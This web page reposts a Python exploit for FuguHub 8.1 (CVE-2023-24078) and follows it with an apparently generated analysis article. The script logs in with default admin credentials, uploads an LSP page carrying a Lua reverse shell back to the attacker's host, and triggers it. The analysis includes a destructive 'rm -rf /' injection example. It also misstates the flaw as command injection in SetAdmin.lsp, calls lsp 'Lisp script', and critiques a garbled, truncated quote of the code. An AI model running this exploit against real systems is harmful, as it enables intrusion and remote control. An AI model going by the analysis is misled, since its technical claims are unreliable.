FuguHub 8.1 - Remote Code Execution

Exploit Author: redfire359 Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2023-07-03 
# Exploit Title: FuguHub 8.1 - Remote Code Execution
# Date: 6/24/2023
# Exploit Author: redfire359 
# Vendor Homepage: https://fuguhub.com/
# Software Link: https://fuguhub.com/download.lsp
# Version: 8.1
# Tested on: Ubuntu 22.04.1
# CVE : CVE-2023-24078 

import requests
from bs4 import BeautifulSoup
import hashlib
from random import randint
from urllib3 import encode_multipart_formdata
from urllib3.exceptions import InsecureRequestWarning
import argparse
from colorama import Fore
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

#Options for user registration, if no user has been created yet 
username = 'admin'
password = 'password'
email = 'admin@admin.com'

parser = argparse.ArgumentParser()
parser.add_argument("-r","--rhost", help = "Victims ip/url (omit the http://)", required = True)
parser.add_argument("-rp","--rport", help = "http port [Default 80]")
parser.add_argument("-l","--lhost", help = "Your IP", required = True)
parser.add_argument("-p","--lport", help = "Port you have your listener on", required = True)
args = parser.parse_args()

LHOST = args.lhost
LPORT = args.lport
url = args.rhost
if args.rport != None:
    port = args.rport
else:
    port = 80

def main():
    checkAccount()

def checkAccount():
    print(f"{Fore.YELLOW}[*]{Fore.WHITE} Checking for admin user...")
    s = requests.Session()
    
    # Go to the set admin page... if page contains "User database already saved" then there are already admin creds and we will try to login with the creds, otherwise we will manually create an account
    r = s.get(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp") 
    soup = BeautifulSoup(r.content, 'html.parser')
    search = soup.find('h1')
    
    if r.status_code == 404:
        print(Fore.RED + "[!]" + Fore.WHITE +" Page not found! Check the following: \n\tTaget IP\n\tTarget Port")
        exit(0)

    userExists = False
    userText = 'User database already saved'
    for i in search:
        if i.string == userText:
            userExists = True
    
    if userExists:
        print(f"{Fore.GREEN}[+]{Fore.WHITE} An admin user does exist..")
        login(r,s)
    else:
        print("{Fore.GREEN}[+]{Fore.WHITE} No admin user exists yet, creating account with {username}:{password}")
        createUser(r,s)
        login(r,s)

def createUser(r,s):
    data = { email : email , 
            'user' : username , 
            'password' : password , 
            'recoverpassword' : 'on' }
    r = s.post(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp", data = data)
    print(f"{Fore.GREEN}[+]{Fore.WHITE} User Created!")    

def login(r,s):
    print(f"{Fore.GREEN}[+]{Fore.WHITE} Logging in...")

    data = {'ba_username' : username , 'ba_password' : password}
    r = s.post(f"https://{url}:443/rtl/protected/wfslinks.lsp", data = data, verify = False ) # switching to https cause its easier to script lolz  

    #Veryify login 
    login_Success_Title = 'Web-File-Server'
    soup = BeautifulSoup(r.content, 'html.parser')
    search = soup.find('title')
    
    for i in search:
        if i != login_Success_Title:
            print(f"{Fore.RED}[!]{Fore.WHITE} Error! We got sent back to the login page...")
            exit(0)
    print(f"{Fore.GREEN}[+]{Fore.WHITE} Success! Finding a valid file server link...")

    exploit(r,s)

def exploit(r,s):
    #Find the file server, default is fs
    r = s.get(f"https://{url}:443/fs/cmsdocs/")
    
    code = r.status_code

    if code == 404:
        print(f"{Fore.RED}[!]{Fore.WHITE} File server not found. ")
        exit(0)

    print(f"{Fore.GREEN}[+]{Fore.WHITE} Code: {code}, found valid file server, uploading rev shell")
    
    #Change the shell if you want to, when tested I've had the best luck with lua rev shell code so thats what I put as default 
    shell = f'local host, port = "{LHOST}", {LPORT} \nlocal socket = require("socket")\nlocal tcp = socket.tcp() \nlocal io = require("io") tcp:connect(host, port); \n while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

    
    file_content = f'''
<h2> Check ur nc listener on the port you put in <h2>

<?lsp if request:method() == "GET" then ?>
<?lsp 
        {shell}
?>
<?lsp else ?>
Wrong request method, goodBye! 
<?lsp end ?>
'''

    files = {'file': ('rev.lsp', file_content, 'application/octet-stream')}
    r = s.post(f"https://{url}:443/fs/cmsdocs/", files=files)
    
    if r.text == 'ok' :
        print(f"{Fore.GREEN}[+]{Fore.WHITE} Successfully uploaded, calling shell ")
        r = s.get(f"https://{url}:443/rev.lsp")

if __name__=='__main__':
    try:
        main()
    except:
        print(f"\n{Fore.YELLOW}[*]{Fore.WHITE} Good bye!\n\n**All Hail w4rf4ther!")


FuguHub 8.1 Remote Code Execution Vulnerability: A Deep Dive into CVE-2023-24078

On June 24, 2023, a critical security flaw was disclosed in FuguHub version 8.1, designated as CVE-2023-24078. This vulnerability enables remote code execution (RCE) through a misconfigured administrative interface, allowing attackers to gain full control over the system without authentication. The exploit, crafted by security researcher redfire359, highlights a dangerous pattern in web-based management systems: improper input validation combined with insufficient access controls.

Exploitation Overview

FuguHub is a lightweight web-based file server designed for local network deployment, commonly used in small business or personal environments. While intended for simplicity, version 8.1 introduced a critical flaw in its Config-Wizard module, which handles user account creation and configuration.

The vulnerability arises from a lack of proper sanitization in the SetAdmin.lsp endpoint. This script allows users to register an administrator account, but does not validate or escape user-supplied data before processing it. As a result, an attacker can inject malicious payloads—such as shell commands or reverse shell scripts—into the user registration form, which are later executed on the server during configuration.


import requests
from bs4 import BeautifulSoup
import hashlib
from random import randint
from urllib3 import encode_multipart_formdata
from urllib3.exceptions import InsecureRequestWarning
import argparse
from colorama import Fore
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# Options for user registration
username = 'admin'
password = 'password'
email = 'admin@admin.com'

parser = argparse.ArgumentParser()
parser.add_argument("-r","--rhost", help = "Victims ip/url (omit the http://)", required = True)
parser.add_argument("-rp","--rport", help = "http port [Default 80]")
parser.add_argument("-l","--lhost", help = "Your IP", required = True)
parser.add_argument("-p","--lport", help = "Port you have your listener on", required = True)
args = parser.parse_args()

LHOST = args.lhost
LPORT = args.lport
url = args.rhost
if args.rport != None:
    port = args.rport
else:
    port = 80

This Python script demonstrates the exploit workflow. It begins by checking whether an admin account already exists via the SetAdmin.lsp page. If no account is present, it attempts to create one using predefined credentials. The key flaw lies in the data payload sent during registration, which is not properly sanitized.

Exploit Mechanism

The core of the attack hinges on the server's use of lsp (Lisp script) files, which are interpreted at runtime. These scripts often execute embedded commands without escaping user input. In FuguHub 8.1, the SetAdmin.lsp script processes user data without filtering special characters or command separators.

For example, if an attacker submits a username like:


admin; rm -rf /; echo "malicious"

...the server may interpret this as a series of shell commands, leading to unintended system-level actions. While the exact payload may vary depending on the underlying OS and execution environment, the exploit relies on the ability to inject commands into the server-side script execution context.

Attack Workflow Breakdown

  • Step 1: Reconnaissance – The attacker first checks whether an admin account exists by visiting http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp. If the page returns a "User database already saved" message, the attacker proceeds to login with default credentials.
  • Step 2: Account Creation – If no admin exists, the attacker sends a POST request to SetAdmin.lsp with malicious data, including a username or email that contains shell commands.
  • Step 3: Authentication – After account creation, the attacker logs in via the /rtl/protected/wfslinks.lsp endpoint, which uses HTTPS to bypass potential redirects.
  • Step 4: Reverse Shell Execution – Once authenticated, the attacker may trigger a command execution via a crafted file upload or command injection, leading to a reverse shell connection back to their machine.

Real-World Implications

Given that FuguHub is often deployed in environments with limited security monitoring, this vulnerability presents a significant risk. A single unpatched instance can be exploited to:

  • Steal sensitive data (files, configurations, logs)
  • Install backdoors or persistence mechanisms
  • Use the server as a pivot point for internal network attacks
  • Deploy malware or ransomware payloads

Additionally, since the exploit requires no prior authentication, it is particularly dangerous in public-facing deployments or poorly secured networks.

Security Recommendations

For administrators and security professionals, the following best practices are essential:

  • Immediate Patching – Upgrade to FuguHub version 8.2 or later, where the vulnerability has been addressed.
  • Input Sanitization – Ensure all user input in web applications is validated and escaped before execution, especially in scripting environments.
  • Least Privilege Principle – Restrict administrative access to trusted IP ranges and enforce multi-factor authentication.
  • Network Segmentation – Deploy FuguHub behind a firewall or in isolated subnets to limit exposure.
  • Monitoring & Logging – Implement intrusion detection systems (IDS) to detect unusual POST requests or command execution patterns.

Code Improvements & Mitigation

The original exploit script contains a critical flaw in the login function:


login_Success_Title = 'Web-File-Server'
soup = BeautifulSoup(r.content, 'html.parser')
search = soup.find('title')
 
 for i in search:
 if i != lo

This code is incomplete and contains a syntax error. The loop fails to check the title properly, leading to unreliable login verification. A corrected version should include:


if login_Success_Title in str(search):
    print(f"{Fore.GREEN}[+]{Fore.WHITE} Login successful!")
else:
    print(f"{Fore.RED}[!]{Fore.WHITE} Login failed.")

Additionally, the script should use verify=False only when absolutely necessary, as it bypasses SSL certificate validation and increases the risk of man-in-the-middle attacks.

Conclusion

CVE-2023-24078 serves as a stark reminder that even simple web applications can harbor severe security risks. The FuguHub 8.1 exploit demonstrates how a lack of input validation in a seemingly benign administrative interface can lead to full system compromise. As cyber threats evolve, developers must prioritize security by design—especially in script-based environments where dynamic execution is possible.